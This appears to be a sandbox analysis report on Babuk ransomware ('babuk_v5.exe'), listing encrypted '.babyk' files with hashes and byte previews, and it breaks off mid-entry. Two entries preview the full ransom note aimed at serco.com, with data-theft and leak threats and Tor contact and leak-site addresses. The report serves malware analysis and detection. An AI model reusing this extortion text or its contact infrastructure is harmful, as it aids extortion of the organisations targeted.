                                                                            MD5:AB4FE0E219CF74793CA583875004208F
                                                                            SHA1:58EA4B13E800E889ED15134084BA12A64EB6C054
                                                                            SHA-256:0A178A3FF577BE5895BB2F69EEE6972605C9C722FEA95A1903490AE99A02E47B
                                                                            SHA-512:87CB8605ECAA2B6A9FE54F08B027B8DAECEF6DBC475D08A16AC3722F6FCCB659029E8ED74B4787EC987B211E8D718E863C9F6CC3392DED8D97EE5D8F08523C6E
                                                                            Malicious:false
                                                                            Preview: 5R0t....'..g.q......F.~/....k^........p3#c...ggP#Qs{r......^.d.K....6....dj.bO.UL...Q.f......#aW..3..bly...R...a. ..4...;..........L.]10.I..6..J...O.Z..BSb..>.f.!................h.,%.M..8..o.@M....A..k........O..(..G.0../l..G.......i(j.^..x..;......O.J.K........_M.J......,..D.(.`.E{r...y....X..n.`..x.0|.(.........K......iZ.".=o.v...Xv-.u....+.Z.T..#..{.1..\......F......B..k...*.m......7_k6[..8..l.....U...9.h...|.../..R)..O.tX..w......s.........._..ejL.#.......m{.mJ..6.x.9...y..._f.6..<.'.E+.j[X.T..(V.f;.1M........n.1.V.:......).L.....20}|.VN .R..r..KL.i.Nf.?....|...Uw ....b. ..|.d...N..,..>...Mz. ............K.GZ.....yJ...,L~~J.J.sMu.....A.Gp.D.K....r/..r.Q.=fQ........J91.U.xG....f..U.....G..........]'=.....9..(..2..,..........\.v.v7.6.!.&r......3b==..C,)/L..h.C..C'F..i.0.....Zg6p.(4]..G...\!..>..c..GKZ.&G.....u$...z=.A.g.kd.....9.1R.Z;.*....6../?p%.. ...?...^@.0..M.9...u...<4.....B_.........I<.,X......A!................C.'f...9..;.%k.
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\RAYHIWGKDI.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.820240589132334
                                                                            Encrypted:false
                                                                            SSDEEP:24:Cc3a9+J1XcMk3xh4MditGv0IPRjupOaKHHNOxPdHM:COaMdcMCxh44lPkODNOPM
                                                                            MD5:FEDF6C4ECCAF249A894E53B6D10A2744
                                                                            SHA1:F806139E41378EBC1B669BDE74A1E7FBFE4D0E38
                                                                            SHA-256:C260EB57158AAF96082EADCC2E6C54DCECD8724BF22FC167A2634A974B71835D
                                                                            SHA-512:DE2AEE7F5EE688CA485D113DE71261DDA2F013959852DB875D48F7AB08144AA065D6CF6005A29CF59CC9EFE47B10054E02D5989599B881EFDD3E3BB7F1875EB3
                                                                            Malicious:false
                                                                            Preview: .b;.D.+6....l......-.=...D.)..I. @.3........o..S.....4....~ |P...l.....j..x.?$.t.l..u*O.t.}H<.... ..Z.9.._.Q+..}.^.;....c......D..N.j.....h.$^"ydW...q.'ug=V....B.:..k.1.#..@..*.f8..I......E+He."..".7R.[.......}.....%I...8Rc<o".....X.dH\...m$..Q.UM..w...xy..P}"77U...P0.3E.V*..L.#. .#5.h...|..{[kf..qh.......Kz.|...<..<f..3Z..,...c)...Z..{y............j..;Yz?m.....u;..)...w... .e>I.].Yc.,.T...*.:..in.6..Ly.l..g..X...@.q..u?N...=.h..;.~..5...W...0..qi&)(.LrL.2..D~3..p..Wg.?.....k.......$...=...1..v...C*...j.UM...p4....E..,.K...K ...4.4.....a...N.1.b4].Z.N....b.O....A........<.*.....\z.&..X.|.....V...].....m.Io./.. .......O.b....=#}..R.?....Zh ].u..AUj9..x^...73.EA...$...W..a.X.x...z......~U...4.i.... VF..iF.p.p.....uO.......Wp<.....OU.).&.[....H.!..l..F..=.(y.Zyz.....w.k)..aV7..&'.R.....2..[..Z..[..F...*..(17.iF..!......!.\..C.....W..?&...y.........F.?#..u....vz}.Z..sAK..+..eI..*rr._..}..3p.{.h'....T]N..R...c.?.t...1.T.0w.A...5......XV,M
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\SQRKHNBNYN.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8347562464384835
                                                                            Encrypted:false
                                                                            SSDEEP:24:zkQwX1avKjcvY9ZFAcx2zQCX9KS1rQKt+uqReoDdbW6DLXIYs:YQEkvKjNZIzHc9Kt+uqRewbW6D8
                                                                            MD5:A25E5C7B2F4F69F641B589B28A902DA4
                                                                            SHA1:AD35A421DA5B64DE76C238C1978CE62A09A21044
                                                                            SHA-256:B9B9625E8D0A636C521E3750F5F10B322D439632AA163A5BD12479AABF936C3A
                                                                            SHA-512:FACB048A5AABFCDAFA57CA73B8B8534B02E2A3F1BC8DD044396E6AA09080AF0CDF5E819BAE6A66491F2CB265E54F9421FD8F332F8F2AB47F763963044FA1DBF7
                                                                            Malicious:false
                                                                            Preview: .{b..M....L.....%..`.1..].*..k...kE.9.-`.....ZS.R..a.D../Y.IK$.n=!.C4.@=.\4.t.?26...r.X..i.n=-...t?\C.J.Sy....R..-dEVW{....J.=L."..*..)^1.....q....Gf.I..x..x.. .=h[..K.....P%...S3.]w^..........3.. P..5.8.8......>.l.....M\....p<...A..N...6...... .+V..A...o.)..y..}....h..1..K.f6.z..C?T..c1....K...3=.w.......Y.....s.....x..&0...+;..R.....ZX.4?....a....p.Y.73...\.5.~7Vt........Yd....WI..4y..g.&....f....}H..6.......Q...O..].......r.. 5..o..2q.".l.......k.'.M.....}."...z..~.?G.`.3.E.%.....;lIJ.w........>p....7....H.H......C.C........?.&....Vs'..Q+.K.......A.w.v.\.aH.....&u..?.r..[".~;..rL=p...Jv...3.P*.f.{.....%C`.A..+.M.k....2H/.a...h.aOUTH4...P5.....$_:M.F.A..wa..A`.v..o.W."..*.@t3...V..Z.....H.niIJ./.P.jW5K..n....zkM#.Q.}..47.L..>/....r.=...*SE....-.h.y. o<...u....d`.\U.\.o.p...~.@S%...9..o...:.....O.......s....k....Qo...X.m..mD..^...........6b..;.;..O. =$T.>.<.'.5+..u..9X..$....r|.o{.G...6[.l.m....T.I=.-;.._7.T..8.......*`3........
                                                                            C:\Users\user\Desktop\JSDNGYCOWY\ZTGJILHXQB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.817495710333979
                                                                            Encrypted:false
                                                                            SSDEEP:24:R1X8c9grN5AU4aco/TKJVQqpcg49rd5pa+6SJHc2FbOexleOvHAlKL:R1X8cCR5Azm/UoFNJHXF/zHAlK
                                                                            MD5:E73C780A80DF3352BD1F766A89E419AB
                                                                            SHA1:5099A04067D18029CABE1E9908FE61A4D64AD416
                                                                            SHA-256:816DF22650302DC5D7EE1E1CC50C3669802331C24A738DAB00349F6FEFE161A9
                                                                            SHA-512:8A50A097C8979FAE9845E024EABFFF82311B9BE22EB3A53074ECF2593720926BE5C0D28F86B16000E48444CB7B3D99B109D7FC844E81340314AED3F13ED3B755
                                                                            Malicious:false
                                                                            Preview: .5>Z.I.H.s.!.$&3....b9.&..6l.~|.?....b>K...<.0......m...H.ol..R}|..u.:^..........Q..$..&.....p..oA..Y...u...*R.HTT>.).\...=.+N..5.x......0k......%.[...R.A0.T.2.a%..v..N}.u. .3M=.....>c.A..s.&N...b.*...s...fa....a4.M.E.).i..X.F.....x.V.....+..)h...N.a..SU'.Wd.M.(.O..C\g....r.ZRvW..h......]..u.....!.$.3....U~1\@.q>.E.../..=..D.....o.+......WF..g(.#.S.x;;...B..9so........2#bB./..c9.|.quOh.)....A.."..]....s.cI3D...}.z..!..u.*}$............@b....k.m.t..#.|X....S.}..\.P.`7.{...e.M.n....Bt..M._...).J.S(..........+....Y@..I..a._,a..|.....D..E.-.~..t.n%`dD.B,.h..u...... ..^-....^...8...j.fjB ..0..}pS.x.4.dEw.u.y...w|..q./..n.p..R..0:I.........<..I.i!A~.l.v\....8I.....':#.^Q./-k.... ...`....8.-..a".p.:.K.X....g`BH..@.qn...qk&./9t..3>...'...@..1....{hL..-~..5?.d..K...aI<.Gd!..:.=cr.2.C.....T_.......|.i.H.].7.{.....R..\10..q..u7..p.b..5....c.q..g.X..q.UE.....4.N<F..s..q3:B.G.f.d~.E..+.!N..,.i..T..'6....s>..o..#......W...g3..r.^...+.e.r..I(r.D.x.......fAE.#..../
                                                                            C:\Users\user\Desktop\KZWFNRXYKI.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.82694271727931
                                                                            Encrypted:false
                                                                            SSDEEP:24:OaCf0JiuoY02jo0DqeXvaMP02vYq2s1CCKidkeoOc/sDoICNUua2Wp/5nJq0hY:3K0JiuEkDqefaMgvcCsdXcsDoI2U/2yy
                                                                            MD5:398728956B62DE8D7BCDF87926850A47
                                                                            SHA1:668B58790D22DC6D3CF0A2387F320C6782D7B383
                                                                            SHA-256:0F84A1FDED9AE07698C9C980DAD57D7605F7C350595ABFED087A73792ECEDA92
                                                                            SHA-512:BB62378740A2B4B8A8FC8C18F3B5688D3D008BA34A4F947AEC84E9DD6CC5A9E0B6CEE048841E72D5EFD5302A843BE586E20CD2503C95CE1FFAD4AFCDF594C507
                                                                            Malicious:false
                                                                            Preview: h.WU......Qrt.*.......W%.3N....ctrH.E"W...=........4.8=..N.............0\~cx96..$=.:._i.cJ,.P..L...>.P.U.@.H9... ds.t.R...$r.3.:...y]..8...<.,...;...3....NALZF...U2...!VI.iM.p.N......M.L.s.&cU...s...TO_..BD.y.!. .0(..w....+.w..5..}).Bz..!.H.......,3a... .].....x8..|l.V9.7Q.O.va..Y#....6.4.GA..s.z.qAt%*_.dz......t;..+...5..XL.7.}..K.....G.N.!...t..."...@.}...r...1V...w..Q.T...K..)J...Z-...7H.<.!.....F+......]VjJn.<.... ...>...tf.:..B.J.&T...W.t3.1..I...b.J.d....z.5....Mb...z..J..B.y.....(.J.r.V.]..o.gi..R..e...@.+....5L...B.4....>MQ...\.8.8|...=@.v4L....PM...K.L;...bQ.....+X.aA.....%.>..nu......9....Y.C.1.&..3.>..z....).......o..z.}NYY......[...i9d..N.+..G...A..K.....]w....4..'..vI"u.l..N....=.j...F>..%@...k./I.F....r.a.....H...c..Mf....m.R0.n...+.3.43.....ps.08#......8-...R......8..x....%.UA.[..Q^.n....A.81..[3.."..J^....HSw..{..w.'.v..v.......f,...A..`..+y.!)x_P....V&~........./,..aT3...C...O...../.....^.p....%.E.U..8....VY.).'...E....e..
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\BPMLNOBVSB.png.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.821043563817252
                                                                            Encrypted:false
                                                                            SSDEEP:24:N7f7RimK9CpEWGIr3tUDzcHmV4z9LILGUcK9Je+Adt6BSGhs:N7f7RG9AXym24zhqGUcK9s+ctcU
                                                                            MD5:AD6A0EAFDC7038C82BF020FB7D3D6550
                                                                            SHA1:227A1050CCFEBD8C6EC5DFAEEED62F333623ABF7
                                                                            SHA-256:88DABF3DAC1BFBA6E4604B13DE37E642DDBBFDB38A5CABE1B59F33AC6C842FCC
                                                                            SHA-512:ADF56FCB991A233CA032CBCACE454DA9CBA1F2528BE55ADD08FAABC5C096F8DEE8802B249A2FC1B9B872CBF9E365D489A658F89BD519253F1790B9613886F45A
                                                                            Malicious:false
                                                                            Preview: Tu......Zq/..z....r.F..0......75F._..i.P..c....2.......8v.b.#2.c9D.<.f.nO`.5N...u...(....QBA.E....8.........-.A.n...?sH.8v.(...F.(... .L.W.=..O.`.LF.a-".w,.TRS.}.S|.(..K..:..`..4[...y.\.....R?p%;.3.@kk.8nN.SlQ...\..U.hSb.C.X..>...b..t.|O..=i..+..X...%*38.3..:.....}=".]..L..v).Q&...}b\b...3QV%?oaA.#..;.z..N.v.Z{(.rc......T(.}z.q...N......C.Dh...+.F/6..m..?_\.5H.f.?...Yv._]{.b..S1.G.#./.(.s..i...%6....d|.v....2\.>.w.Ys.v..k...1O[........F.Nw|..FL...L)%.C....W1..JK_. .....ET.&..p.H.5zff0..[.I5.],jSfg...gu.(iNv.!......U6[4j.df.%.M6.x\.;..Z..<.W$.v.}..%w}.A...K.....36;.....t....W.1..Mu.......Z?/....8_......`y..d....z.it..+l......#...>...yT.....M.I!..z...[(...p.....y.Z.#......K....;.........v.i/.......v.....@.B.gIzc#...v...p.8B..ea..nu.H...1R....0.I.~&.M..x.3.c.O..O....NH..\..K....Z...%.X..<0G^..A..B...Y...%Y.x.x/.A.........4.{..0W.......6('..!g../......$A.....t...L...%'O....:9C...Xd.^..'....).*Xi._..w.&.Y5$i.O....txB.5...T..A.......&..S~J...M.3..{KA.....@
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\JSDNGYCOWY.xlsx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.819333286252541
                                                                            Encrypted:false
                                                                            SSDEEP:24:n61y1bDG5ntezV4yA0fYkBbg1460X9XYwUj2dD0gPUtCoQ:n6EhDGCzc0Vbg1D0X9IF2D0KIK
                                                                            MD5:F7F2E4F19248FBB082341D9129F91D75
                                                                            SHA1:2CE0D47934F89E34B22CFA83A3DBEB4F5E65DC13
                                                                            SHA-256:60CC1F3D2E0FBE0D3249A051D522C92C9AE99725BDEA28C38D356F5D23B42FE8
                                                                            SHA-512:7C494127CEE07BC59C633E1BFC8B8684F856D6E0E414ADDF44920764A137AD916FC2E83D060D479336B20F258BB96680C1278F36FF26B1DA9F66BEC3C8587CF1
                                                                            Malicious:false
                                                                            Preview: .O9l..3.3.R..H.~qx......r.i.......?.J8.xC.Qp.p.W.l.w.!..8a.3.?`...-C..g...F}.....6vP......_........H...|...L......%o.}.l.g.I.T.......R...|.H.PB..P.A..........[==F.......rA3.W...>.....;....3.4Z5..#....w.*.B.qT.t..><.o.......,.af..[q.*+.GS...+..x.Y..Wu.O.....g.9\..1.z.K..FJT.k.,/..-z..[.....+..Gm...=....Uj.......t`l.....Wq...;.._...2..||...E...k.../.9.....$m..(.D....j.B..../..y...........DG...~\v$w..D..+P.+.....5%..+.Q..$r.....g.K..;...6..]...L...(...{....g..\..I..$.....&.+bj.......'..r0.......i=...C.5H....`..P..S'......h.Q...!(...n{SN.hU.-..8_$..?....5Go4W..4......_.t]...%...a.L{.....+[.R..V.A..P.{/x.:m..gS./I....}.[%..w6>8:N.RmTL7fi.v..n.4t....F..yO..D.p.....=.Bhp.......3C:d.{.....dJ.O....~..\.,w.H@H...[...Iz.#H.}%..Q6O.S.......!.... ..+..&..y.Y.J.D....i.V.(.d6...h.*dM3c......m..f'.. ..\C..~..^{+o.!}i...x..!..B...`.:..._h..'.5?.|5.....t.&,.}@.{..z..6%Vd...j.......r.....,.p1.'.............z.3.<.7-g......x.;..3.F.3..z.N...RD.Da.)
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\KZWFNRXYKI.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.837123793668199
                                                                            Encrypted:false
                                                                            SSDEEP:24:YGWHOZcD0Nj8tIRxkjgHeppsQPlWffvGYe2Wi3R:YlkJYtI31afdWffv/3h
                                                                            MD5:3DC1349BB5E838C70D219F8C51ED8F4C
                                                                            SHA1:ECE54F983AFBEEEB0BCDCAE068BF8C76F878ECFF
                                                                            SHA-256:F707C4ED789D22A004A9E62B0FBD9DC2F1485F7DA13ABA589F9F19830F8C8298
                                                                            SHA-512:0488B21A4704E10E6E9401ADEFFC655B2D04F547E348FDC3021E270A57CDC90B24D6FE136FEF49FBF8982F38ED362EC9B92765E4203B4D35119588B8EF9C7A0A
                                                                            Malicious:false
                                                                            Preview: N.<....?..K...w.{.gLc.u...z.5.%....p.".2...T....l9..Yf........4...dLN.)%.l.+*;...8..I......BMm..&d9.^....vQ........-a.....b..=:..../......Ht.rpb.&.2......+....`j.s'p&.CYF..L.U.f..%O;S..K.j7..<.....=?..%....$.7sD.dm./z'd...N.G..v..]...%...R.|....U.Pm..Yy6..Qvz....i,...1Rd..@.....1..V6N......1.65..n....*_].p.&......8.....~.9.....W.d.=.. "......h...../.n.......)...o}.^....r*..i...p.0..v..9............NxW.&._c.sZ...S....[.@..X.k.?.c....-..s.*.bp..n!&7w......7.....}...n,i.X..t..D.,.+s4J.r..}.%H...D(.s.g.r.....@...qI0M.7.\.9A..9*C.L.<...a.t-i...G..._...u.9^.....Q5Y`.>b`z~.!(...Uv&.B..........l....`..[.5..).ZQ.@f.yaNz...!.{...e.uA.|eO......b.\...E...EF.N.....w.C..V....)...q.Y!.....).&Xw.S$....6@...F........D.......sN`.&...ON....*...t.....90>_..%.+..=.rl...Y...O....a@.~o....<..lr]....Y.$..yD.._A..6...]...=ru.....\.zR./..>...g....%..s.......K1.&t.cHQ.....dk,.......+R..l....mu..#|.3~..cg..B\..............v..+`..k....^.G .?.[7.#
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\NIKHQAIQAU.jpg.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.850266700276233
                                                                            Encrypted:false
                                                                            SSDEEP:24:dmdso9dT7SWEg1iWP3gBwlkuWE4HryLNGLcHIw8AUB2cIm4bGGLnOnJfHOsfQl:kdso9NltgG21BrqEcow8x0K4SQnqNZO
                                                                            MD5:1BD90AE33B72AC9DE1DC4899446310E5
                                                                            SHA1:E847908FA48DEA91F60BCBEF27A564012946D17D
                                                                            SHA-256:BF8CEBFF5F3A5849BC9BEA67DA0E6FFD18985843A8064BE205DADFDA89D6BCB4
                                                                            SHA-512:AFDE866023AA07E69143808FF463B536D55899B2E24B207B3EFD6FE3BD575A9330EBB7129E91C28CB41B7288F1ED4B0B14C711F2E7D3C36774A69B7960AFB8A8
                                                                            Malicious:false
                                                                            Preview: ...=...o.L../.......2..}2.X...n*>..8..<.d/`......,.....2w.].._.v..x..O.`..UZ.~.....CM.I.p.QA.R=..S|@..Ay..A.............5S>.3.....P...........)..<%D:..m._..?.$.`..59..........j2.Dg.c.....E..:g{;..0....%..%.......!];(.F...U>.q..O.{.Y..f..rJj\......8....'W...#....@....b!\s..gx...X....`?..<.t...8.p*......u..Wf.6^o02<.&[..r.j.P._4.<....|{h..a.C`.F?.X.H....@..4?....0..".......,b.(..(...&{....X.N3.+..e....df.}.t.}U..qz.+AH......V..'$.4..B..y..5..'..Ci...}...G....k...XK.....i...;..:...d.F+.Z..hKx...eh..P..D.......v..RSGE............Mx.0.hDVd...qD+g3..i...x.:.R.D^..:.r...{..FR.E7l....4.../..W. .....(^0!N+Q`q.L.TW.9.F.c......u.5y&.#...Y.....3.q~+....H...B}.L1..h.VCh.....kc.U...+.......R.,.b.........Q.W.-.rJ=u.......2B........5.x.../.2?.jom.e....e..@..VJw}-....4.E.p~.=...Th.....6.3.o.[.&Al,.Oc.'......@s.\..]..g.E-`]Vm.3]...?..U).....Q-..-..~..Fv.M..u ....8s....G..eB.C.sl..d..|W..:.*:y..?:.&....g*..Sj...Q;]F..A.GCP.........&..a2py.....I.E
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\RAYHIWGKDI.mp3.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.835186168765143
                                                                            Encrypted:false
                                                                            SSDEEP:24:RHnbYVWcKL6o5odHyHYOEKxHyAzeEu03e8xGeVtPvftNfOJ4IN7X/8L:VnbYVWcKWo5odHyHxEKxSWeN0O8fps4V
                                                                            MD5:E1887E656A44B6C0A8B71306BD8A4ECB
                                                                            SHA1:D9928DA641A6EDDF71F46023D14D1FD8912C3BAA
                                                                            SHA-256:2B8B1BE852BC5DB84A5C319FAD772617DC609B728866EFFCC74C8A51CAE5CC62
                                                                            SHA-512:A4C1E75C022E6B0B507C403F4E5D77DA03204A7B809764BD7E7524B7F4BEC5AC71B380070AB395E5BB5337137CD0359D4FD233829C205E782A70011BFA63DC1D
                                                                            Malicious:false
                                                                            Preview: .95n..W.:Fl.p....9......s.VH.rc...Jqr.....!O..L.=...#r.....B..uW2. ..4Y.....d.L....|FYA.Bp.9T.....!.C5.-7.......x%.......CU...9s...$.0.W.Af...3.....1A..R...,FA..X.?...#.f..?.p...oa.}..O..aE...@.8.6V..@b....2w....v.r...q@.ZF.[......X..c.P..I...s{...:..o.bt.c..HF.F....6.|...).../.0.......@n..).P..Y.n...>.{..<.._2B.'=Uc........X]s]c_..?..u..`..f...M=.....9i_.d;V>i...<t.0.=w...V.v'..N.[.~........4=~Z.....c......T..5.../....L..\4.%I`?.....w!rH.[...U{..o...,B.....56..y.$...A..5.....`[X.....R.&"M...P...AY.`c.*....H.....A...O .Ec....L.O. [......q..H0....d..%k.......ym...Nz......EMJ.(...FG.&......Vm.ui..H...E8..Y...>F...K.4......l.yMr.I.R.Vp..>.S..O.D......"G..H.!m]..,...9H{.,................\...Jd.........B.#f...{.c..{..._a..vb9Oi..4`4.u.<.8..j....N}]u@$.q.. .%..G..)...\:..oz".5/.g.... ..R.E...En.}[I.8.M.|v$F5..X...BHK]..#..z.{.:^.OG..J#Q...=....EE-...k...e .......K..h...Z....m.[.h.Z...az7....T.._...t.t4K...o.3.NU3CE`....4E.1.H.0\..b.
                                                                            C:\Users\user\Desktop\KZWFNRXYKI\ZBEDCJPBEY.pdf.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.8147976432935
                                                                            Encrypted:false
                                                                            SSDEEP:24:gZfqtAI2v6r8P5ZgWpVBvvsb+Ep1dpz45XDfPpqGFoEeiUVkUKDu:gN96ruZgW/hkb3i9pqsoEtUVkUKDu
                                                                            MD5:C18557126A6C8082DB39653D3AD74FF4
                                                                            SHA1:396F98DE8C095354A3B6261E6698E06370529BFC
                                                                            SHA-256:C950D09B96205784D9A21F656532D0065CD51C781D3A2F8C2409EA0ED5AE50ED
                                                                            SHA-512:182D0C669384B4AAE73EB553F008D569DA24EF696DC647D0B89E3C92E3D9CB5583D345742A7BBE810C6DA6CC7F7A66D3448826BE6140E42D023395AAC4A5196A
                                                                            Malicious:false
                                                                            Preview: >l..R`D!..].~.......*\Q...P.c.}.k).l..3.J`...../rM.....:p.e".G..............!R......avP..e.P.Y......l..5Nx..n....m...1+.is...3A.".!,......@C,...*7B...`...6./tW......{.......V&*&<..mw...*..!.L\.\.hn.K... 0..^U..e9....3....,Pps3*..*.h......!\d..c.DnB.A..!.0.#U......-._l!do......f.I<q...CV.S....Y6.f.....Q7.hU.b...'..>*...^.Q;-......=7*x....;.+.......Q..9{..'+.M.p.....Z~........T*...%...jF.zy.{e.`an4..$...G...7b/..I.j..`.....5....z.s../....~.I.......m7bJT.mF.KP.1......T-.QD. .....L.6.%..<.Yl.dH.?....w`...H......^..-....t.:.......j....x....]....6.....n..O.-!i0.j1s._...i.. ........n.j...zK....d.O.......x..;k..V1"D.!.^.d.w.....K.H..v.._....-.K.......h3E@.=t......G.j....e-..7V.....^f...Z.7.S....J.....!.....(..S".L9.V.'...z...r_....}..C.>|.n.d=....f........qY....).5...g..<R........aL...'......H,....0......z...]-$...$.LG..+.w. .W.r...u.#.|^'...#."D.n.......:c.~.kP.....i./..'.E.@..T.s...Y...00..iG....T./.DE..9.........r..l.a.... .....N....
                                                                            C:\Users\user\Desktop\MXPXCVPDVN\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Desktop\Microsoft Edge.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1585
                                                                            Entropy (8bit):7.891924315021363
                                                                            Encrypted:false
                                                                            SSDEEP:48:zpYmw0zGOpTbuOMXsERUDOubP9EUFmfqp4e/I:umwMlEYZbP9BWaI
                                                                            MD5:96ECCC8E275A147FEB5709FACB50A92A
                                                                            SHA1:0EAA8C909094F64CE07C0556352B3B27925D210F
                                                                            SHA-256:917DC423197CE11CE4E0A15576FEBB9B5D41629F84F209C7BDF2A1E8F5B0D7A9
                                                                            SHA-512:32E8D968EA0727C4372655902437F355EE70EC261EBFA6EA1477425F0EF6C7BDA8CD5855371EAC27401D1640FABBA10D9C57D121CF5F3E847FB435054EBAA3D8
                                                                            Malicious:false
                                                                            Preview: PS.[.&.Y......G.......u.R.M......;.k5H{P0..AV.P(...=......).wSZ.^...U..m.$.>.x.....x..u.\...h.T.`..4.........D.).k.T:.l............I....Ht......m&..I.V..j.*...=9xg..._?C...*.B.`%k0..\..........V.c.......,....L...YU......#.5.7..*...q.;.XQ..w?....4.nA..L.TZ...d..\...y..q%.`.i....,.w....F,%..R..u&.......X.;&.K......!.>..R&...n...m|.o..u.".|.....G'..)~6.....`Dy..5k...=......ju.z>.T.....u._..:..S....x..];g..-.r..^........Fosq....8U.:...z.Q...]...F...M.3....7]...u..!V'.w!}O.......R".....d.l.$e...r...X....YB.(.T..4...RIu...r].-+L._.x.t.!......D...JI....EW...).{..U.....v_4$...V'....>.;~Rg.....JP|..#.=.t..p..q..O..7x=l.... .5.[u..K.........r).@..p>.....X...Q=..). L......HM.L#.WA/.sG^...P?~.......;.....^~@...>g..b.Fy}A.#q...v....5:.}`.a].1v...I>g<D.......O.9~..Z..'......o....xvT|...(S\e...p..'..c......n....1...%.0.O.cf*(...*...).R.O....Ei..|...i.4.k.V..Ci..$....)[PB..]...X.....jS.....y.{....k.h.~{...I......=..p.Iu..?^....S..
                                                                            C:\Users\user\Desktop\NIKHQAIQAU.docx.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1194
                                                                            Entropy (8bit):7.819435520685918
                                                                            Encrypted:false
